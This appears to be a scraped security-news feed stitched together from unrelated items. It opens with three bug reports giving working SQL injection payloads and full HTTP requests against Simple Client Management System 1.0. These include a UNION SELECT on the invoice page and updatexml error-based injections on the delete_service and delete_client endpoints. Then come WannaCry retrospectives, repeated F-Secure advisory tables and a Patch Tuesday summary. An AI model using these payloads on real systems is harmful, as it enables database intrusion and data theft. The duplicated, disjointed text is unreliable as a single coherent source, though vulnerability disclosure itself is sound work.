Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/admin/?page=invoice/manage_invoice&id= // Leak place ---> id.

**Simple-Client-Mnagement-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/admin/?page=invoice/manage\_invoice&id= // Leak place ---> id

Vulnerability location: /cms/admin/?page=invoice/manage\_invoice&id=, id

\[+\] Payload: /cms/admin/?page=invoice/manage\_invoice&id=2%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12--+ // Leak place ---> id

GET /cms/admin/?page\=invoice/manage\_invoice&id\=2%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3m0l1n81dvmlo0a3h9oo72q1gp
Connection: close
// Leak place ---> id

CVE-2022-29747: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Master.php?f=delete\_service

Vulnerability location: /cms/classes/Master.php?f=delete\_service, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /cms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=maintenance/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29750: bug_report/SQLi-3.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/classes/Master.php?f=delete_client.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/classes/Master.php?f=delete\_client

Vulnerability location: /cms/classes/Master.php?f=delete\_client, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /cms/classes/Master.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.19
Content\-Length: 61
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/cms/admin/?page=client
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5u3dthmlo3ajo2g7k8pfvb4g8h
Connection: close
id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29751: bug_report/SQLi-5.md at main · k0xx11/bug_report

Five years since WannaCry exploded onto the scene, ransomware still tops global threat lists ANALYSIS Five years ago today (May 12), a ransomware attack blamed on a North Korean hacking group hit comp

Five years since WannaCry exploded onto the scene, ransomware still tops global threat lists

**ANALYSIS** Five years ago today (May 12), a ransomware attack blamed on a North Korean hacking group hit computers running Microsoft Windows, encrypting data and demanding ransom payments in bitcoin.

WannaCry, the biggest ransomware attack in history, spread within days to more than a 250,000 systems in 150 countries.

But a kill switch was discovered by British security researcher Marcus Hutchins, who inadvertently stopped the attack by registering a web domain found in the malware’s code.

Once the ransomware checked the URL and found that it was active, it was shut down – buying precious time and giving organizations breathing room to update their systems.

“It didn’t feel real and the reality never really set in. Still to this day it feels like it was all a weird dream,” Hutchins tells _The Daily Swig_.

“It’s rare for such sophisticated exploits to fall into the wrong hands. Even to this day, nothing close to the severity of the exploit WannaCry used has surfaced.”

**Ongoing threat**

Five years on, though, and the effects of WannaCry are still apparent, with other attackers emboldened to act.

“Little did we know then that it was just the start of a rise in more sophisticated, widespread, and detrimental ransomware attacks,” says Joseph Carson, chief security scientist and advisory CISO at Delinea.

**RELATED** Ransomware surge prompts joint NCSC, CISA warning to safeguard systems

“Since then, we have seen a steady stream of high-profile ransomware victims, along with a rise in the number of ransomware groups offering ransomware-as-a-service.”

Indeed, according to a recent report from Sophos, two-thirds of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020, with almost half of those whose data was encrypted paying a ransom.

Even WannaCry itself is still on the loose and causing significant damage, with Trend Micro reporting that more than 5,500 cases were detected in each of the last three months of last year. Clearly, organizations are still failing to act.

“Given the significant coverage, both technical and high-level, much of the industry anticipated it would prompt organizations to take real defensive action,” says James Tamblin, president of BlueVoyant UK.

“Yet, over the past five years, we have witnessed ransomware actors use near-identical methodologies – and in many instances, identical tooling – to accomplish their objectives.”

**Basic steps**

There’s broad industry agreement that more needs to be done to defend against ransomware, with Carson urging organizations to take basic steps to protect themselves.

“One is segmentation, essentially putting in place technical guardrails that separate one business function from another. This minimizes the unchallenged propagation of malicious actors and malware,” he says.

“Another best practice is to identify all critical assets which are most commonly targets for attacks and perform frequent incremental backup in the event a system recovery is needed. Strong multi-factor authentication and privileged access controls are also obvious components.”

Read more of the latest cybercrime news from around the world

Meanwhile, he says, organizations should consider a least privilege approach to access, limited to only what is required for the job function or task.

But the general culture within infosec is also a factor in the continuing proliferation of ransomware, according to Ian Farquhar, field CTO at Gigamon.

“Instead of fostering industry-wide collaboration and enabling the transparency needed to tackle the complexity of ransomware attacks, the blame culture, with constant finger pointing and criticism from the side-lines, is rife and on the rise,” he tells _The Daily Swig_.

“Infosec professionals are at breaking-point, with 41% of IT security managers in the UK considering quitting. And with ransomware groups like Lapsus$ typically preying on disgruntled, stressed employees and offering financial incentives to enable intrusion, the industry needs to change fast.”

If you haven’t already seen it, check out WannaCry: The Marcus Hutchins Story documentary on YouTube:

This three-part miniseries made it into our Top 10 Hacking Documentaries of All Time list.

Additional reporting by Jessica Haworth.

**YOU MIGHT ALSO LIKE** Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

Marcus Hutchins on halting the WannaCry ransomware attack – ‘Still to this day it feels like it was all a weird dream’

WannaCry continues to be a reminder of the challenges that organizations face dealing with the ransomware threat.

The ransomware landscape has evolved considerably since WannaCry dramatically drove home the potential severity of the threat five years ago on May 12. What has changed somewhat less over the same period is enterprise preparedness in the face of ransomware attacks. 

Ransomware emerged and has remained entrenched as one of the most difficult security issues for organizations across sectors in the past few years. WannaCry itself, while nowhere near as widespread as it was initially, remains a potent threat and even figured in some vendor lists of top malware threats as recently as last November.

By most accounts, enterprise organizations have gotten better at remediating vulnerabilities and updating obsolete and outdated software. Even so, the vulnerable version of the Server Message Block (SMB) protocol that WannaCry used to spread like wildfire remains in widespread use across organizations and regions. Most attacks against the SMB protocol still attempt to exploit EternalBlue, the exploit that was used in the WannaCry attacks. Patching and vulnerability management programs continue to pose challenges, as do practices such as threat detection, remediation, and response.

Meanwhile, ransomware and the manner in which it is used has changed. Many ransomware attacks these days are highly targeted and involve hands-on tactics for maximum effectiveness. Tools are increasingly becoming multiplatform, meaning they can be used to attack different operating systems. Examples of these tools include Conti, BlackCat, and Deadbolt. 

And the proliferation of ransomware-as-a-service offerings has lowered the barrier to entry for common cybercriminals, even as it has fostered increasingly businesslike hierarchies and processes within the criminal industry. A high percentage of ransomware attacks these days also involve data theft and denial-of-service attacks as additional forms of extortion.

**Alive and Kicking  
**"WannaCry, though not nearly as prevalent of a threat as it once was, is still alive and kicking," says Tessa Mishoe, senior threat analyst at LogicHub. Over the time between its first attacks and now, the ransomware industry has learned from WannaCry's efforts and the responses to it — whether it be new tactics such as auctioning data and blackmailing customers or new techniques like more complex virtual machine escapes and persistence. "Ransomware's increase in market share should be a good indicator of how WannaCry launched more intrigue into ransomware," Mishoe says.

WannaCry surfaced on May 12, 2017, and in a matter of days spread to some 300,000 computers worldwide. Though many have described it as ransomware, one of its main functions was to wipe data clean from infected systems. 

Numerous organizations were affected in the outbreak, including FedEx, Nissan, and, perhaps most notably, the United Kingdom's National Health Service. The US Department of Justice and numerous others have attributed the malware and the attacks to North Korea's Lazarus Group. Over the years, researchers have estimated damages associated with the malware to be more than $1 billion dollars.

The malware spread via a publicly leaked, US National Security Agency (NSA)-developed exploit called EternalBlue that targeted a critical remote code execution vulnerability (MS17-010) in Microsoft's Server Message Block 1.0 (SMBv1) file-sharing protocol. Once installed on a system, WannaCry quickly spread to other devices running a vulnerable SMB version. Most of these were older Windows systems, such as those running on Windows Vista, Windows 7, and Windows 8.1. 

Though Microsoft had issued a patch for the SMB flaw more than a month before WannaCry, millions of computers were unpatched against the problem when the malware hit.

**A Continuing Threat  
**Five years later, attackers are continuing to use the EternalBlue exploit to deploy WannaCry and other malware on enterprise systems.

A recent analysis conducted by Barracuda Networks of attacks over a three-month period shows a staggering 92% of all attacks on SMB port 445 involve attempts to use the EternalBlue exploit. 

"There are still machines out there that have never been patched against these sorts of exploits and likely won't ever be," says Jonathan Tanner, senior security researcher at Barracuda. "So, it's not a lot of work on the attackers' part to try to find and exploit these systems."

Much of this also is due to continued delays in organizations updating their infrastructures. A survey of 500 IT decision-makers by vendor ExtraHop found 68% of respondents admitting to still running SMBv1, even though newer, more secure versions of the file-sharing protocol have been around for years. The company will be discussing the obstacles that companies face in hardening themselves for ransomware attacks at the upcoming RSA Conference (RSAC), in a session aptly entitled, "What Will It Take to Stop Ransomware?"

SMBv1 has been deprecated since 2014, notes Jeff Costlow, ExtraHop's CISO. "I wish it was surprising that 68% of organizations are still running SMBv1, but I see example after example of organizations running outdated, insecure, or unencrypted protocols — either knowingly or unknowingly," he says. The risk is huge, he adds. "SMBv1 doesn’t need to be installed on every device in the environment to be used to launch a catastrophic attack. It only needs to be on one."

Brian Donahue, principal information security specialist at Red Canary, says that, for the most part, organizations are less vulnerable to WannaCry now than they were before. Even so, many organizations still have not updated to MS17-010 and their SMB installations remain susceptible to the EternalBlue exploit, he says. 

"More generally, enterprise patch-adoption lags behind vendor updates, and organizations will always struggle to keep up to date with new software releases," he notes.

Organizations also need to keep on top of cybercriminal innovation. To that end, Red Canary's Katie Nickels, also a SANS Institute director, will be part of a panel during June's RSAC entitled "The 5 Most Most Dangerous New Attack Techniques," which is aimed at highlighting emerging threat vectors for ransomware (and other cyberattacks). 

**A Dominant and Evolving Threat  
**Donahue says ransomware was one of the most dominant threats in 2017 and remains a major threat in 2022. Worm-like ransomware threats have transitioned from being an emergent threat to the de facto standard for ransomware campaigns. Even more than that, the adoption of exfiltration techniques to perform double extortion was uncommon in 2017, but it's extremely common now.

The ransomware industry has evolved in other ways as well since the WannaCry outbreak. Researchers at Bishop Fox who analyzed the threat space recently spotted a trend toward the use of ransomware as a decoy in state-sponsored attacks, cyber warfare, and criminal activity. They noted how WannaCry, NotPetya, and WhisperGate were disk wipers disguised as ransomware that tricked victims into believing they could get their data back if they paid a ransom. 

In the same manner, attackers are using ransomware to distract victims from an attacker's true motives, according to Bishop Fox.

Today's ransomware attacks are also a lot more tailored and customized compared to WannaCry, which spread indiscriminately in automated fashion, says Trevin Edgeworth, red-team practice director at Bishop Fox. He points to DarkSide, the ransomware that hit Colonial Pipeline, as an example of ransomware that is being largely human-deployed and aimed at specific organizations. 

"Whether it is patient information that a healthcare provider maintains, or the continued operation of systems critical to a manufacturing company, today's attacks are tailored and customized to each targeted organization and what is critical to them," he says.

In a report this week, Kaspersky said it had identified recent instances of ransomware groups taking sides in geopolitical conflicts — such as that involving Russia's war in Ukraine. Groups behind the Conti ransomware family, for instance, have allied themselves with Russian interests, while others such as the IT Army of Ukraine are on the opposite side. That alignment could have an impact on targeted organizations.

WannaCry was a wake-up call for many organizations around their patching practices, and it did foster stronger vulnerability management programs. However, many organizations continue to prioritize operating system patching over patching key applications such as Java, Office, and Adobe products that are installed ubiquitously throughout their environment, Edgeworth says.

"Ransomware preparedness starts first with excelling at basic security hygiene, such as secure network architecture, reducing unnecessary attack surfaces, and enforcing least privilege around Active Directory and 'crown jewels' systems," Edgeworth says. "Organizations must have a plan in advance on how to respond to a ransomware attack."

5 Years That Altered the Ransomware Landscape

A vulnerability affecting F-Secure SAFE browser was discovered. An attacker can potentially exploit Javascript window.open functionality in SAFE Browser which could lead address bar spoofing attacks.

**CVE ID** **DATE ISSUED** **ADVISORY TITLE** **AFFECTED PRODUCTS** CVE-2022-28873  
12-May-2022 Multiple Address Bar Spoofing Vulnerabilities in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 19.0 and below CVE-2022-28872  
12-May-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 19.0 and below CVE-2022-28871 25-Apr-2022 Denial-of-Service (DoS) Vulnerability All F-Secure endpoint protection products on Windows and Mac CVE-2022-28870 14-Apr-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 18.6 and below CVE-2022-28869 14-Apr-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 18.6 and below CVE-2022-28868 14-Apr-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 18.6 and below CVE-2021-44751 25-Mar-2022 F-Secure SAFE Browser vulnerable to USSD attacks F-Secure SAFE Browser for Android Version 18.5 and below CVE-2021-44750 09-Mar-2022 Arbitrary Code Execution F-Secure FREEDOME VPN, F-Secure SAFE, F-Secure KEY, and F-Secure Internet Security/Anti-Virus CVE-2021-44749 03-Mar-2022 Universal Cross-Site Scripting Vulnerability in F-Secure SAFE Browser Protection for Android F-Secure SAFE Browser for Android Version 18.5 CVE-2021-44748 03-Mar-2022 Universal Cross-Site Scripting Vulnerability in F-Secure SAFE Browser Protection for Android F-Secure SAFE Browser for Android Version 18.5

CVE-2022-28873: Security advisories | F-Secure

A vulnerability affecting F-Secure SAFE browser was discovered. A maliciously crafted website could make a phishing attack with address bar spoofing as the address bar was not correct if navigation fails in a loop.

**CVE ID** **DATE ISSUED** **ADVISORY TITLE** **AFFECTED PRODUCTS** CVE-2022-28874 23-May-2022 Multiple Denial-of-Service (DoS) Vulnerabilities All F-Secure endpoint protection products for Windows and Mac CVE-2022-28873  
12-May-2022 Multiple Address Bar Spoofing Vulnerabilities in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 19.0 and below CVE-2022-28872  
12-May-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 19.0 and below CVE-2022-28871 25-Apr-2022 Denial-of-Service (DoS) Vulnerability All F-Secure endpoint protection products for Windows and Mac CVE-2022-28870 14-Apr-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 18.6 and below CVE-2022-28869 14-Apr-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 18.6 and below CVE-2022-28868 14-Apr-2022 Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android F-Secure SAFE Browser for Android Version 18.6 and below CVE-2021-44751 25-Mar-2022 F-Secure SAFE Browser vulnerable to USSD attacks F-Secure SAFE Browser for Android Version 18.5 and below CVE-2021-44750 09-Mar-2022 Arbitrary Code Execution F-Secure FREEDOME VPN, F-Secure SAFE, F-Secure KEY, and F-Secure Internet Security/Anti-Virus CVE-2021-44749 03-Mar-2022 Universal Cross-Site Scripting Vulnerability in F-Secure SAFE Browser Protection for Android F-Secure SAFE Browser for Android Version 18.5 CVE-2021-44748 03-Mar-2022 Universal Cross-Site Scripting Vulnerability in F-Secure SAFE Browser Protection for Android F-Secure SAFE Browser for Android Version 18.5

CVE-2022-28872: Security advisories | F-Secure

By Waqas
The latest edition of Patch Tuesday offers fixes for 7 critical flaws, including 5 RCE (remote code execution)…
This is a post from HackRead.com Read the original post: Microsoft Patch Tuesday: Fixes for 0-Day and 74 Other Flaws Released

The latest edition of Patch Tuesday offers fixes for 7 critical flaws, including 5 RCE (remote code execution) bugs and 2 EoP (elevation of privilege) flaws, and 67 other relatively minor flaws.

Microsoft has released its May 2022 Patch Tuesday update. This time, the company has released fixes for 74 new security flaws, including a Windows LSA Spoofing Vulnerability.

According to the Redmond-based tech giant Microsoft, this vulnerability was being actively exploited in the wild. It is worth noting that Microsoft releases patches for its products on every month’s second Tuesday, hence the name Patch Tuesday.

**Which Products Received Patches?**

May’s security update involves patches for several components of the Windows OS such as the Visual Studio platform, the .NET platform, MS Office, Exchange Server, Remote Desktop Client, Windows Hyper-V, Windows Authentication Methods, BitLocker, Windows Point-to-Point Tunneling Protocol, MS Edge, and NTFS. A Beijing-based cybersecurity firm Cyber-Kunlun reported 30 out of the 74 vulnerabilities. 

**Details of the Fixes**

Apart from the abovementioned vulnerability, the latest edition of Patch Tuesday offers fixes for seven critical flaws, including 5 RCE (remote code execution) bugs and 2 EoP (elevation of privilege) flaws, and 67 other relatively minor flaws. Furthermore, the tech giant has fixed issues related to Denial of Service, security feature bypasses, information exposure, and spoofing.

**Critical Flaws Fixed in May 2022 Patch Tuesday**

Here is a detailed analysis of the most ‘important’ and ‘critical’ flaws patched by Microsoft in its latest update.

**CVE-2022-26925**

This is the only actively exploited flaw in this list. It lets threat actors perform a Man-in-the-Middle attack by infusing a method on the LSARPC interface and forcing the domain controller to authenticate the attacker using NTLM.

The flaw was identified in a central component of the Windows Local Security Authority process and impacted Windows 7 to 10 and Windows Server OS 2008 to 2022. Microsoft gave it a CVSS severity score of 8.1, noting that if used in combination with NTLM, the CVSS score will climb to 9.8.

**CVE-2022-26923**

This critical vulnerability inserts crafted data into an original certificate request to exploit certificate issuance and lets the attack obtain a certificate to authenticate a domain controller with elevated privileges and become a domain admin. This flaw was given a CVSS score of 8.8.

**CVE-2022-26937 and CVE-2022-29972**

These vulnerabilities (1 & 2) are noteworthy since the first one is an RCE flaw in the Windows NFS (network file system) and targets methods used in mixed OS environments. In contrast, the second flaw is identified in the Magnitude Simba Amazon Redshift ODBC Driver.

**CVE-2022-22713**

It is given a CVSS score of 5.6 and according to Microsoft, it is a Windows Hyper-V Denial-of-Service issue. Successful exploitation of this vulnerability requires an attacker to win a race condition.

Additionally, several RCE bugs were also patched in this update. These include CVE-2022-22012, CVE-2022-29130 in Windows LDAP, CVE-2022-26927 in Windows Graphics, CVE-2022-29133 in Windows Kernel, CVE-2022-22019 in Remote Procedure Call Runtime, and CVE-2022-30129 in Visual Studio Code.

**More Microsoft Security News**

1.  Attackers exploiting Windows Installer vulnerability despite patching
2.  Attackers bypass Microsoft security patch to drop Formbook malware
3.  Microsoft Patches 85 Flaws, One Allowed FinFisher Spyware Installation
4.  Microsoft warns of Azure vulnerability which exposed users to data theft
5.  Unpatched Microsoft Exchange Servers abused in a new phishing campaign

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#windows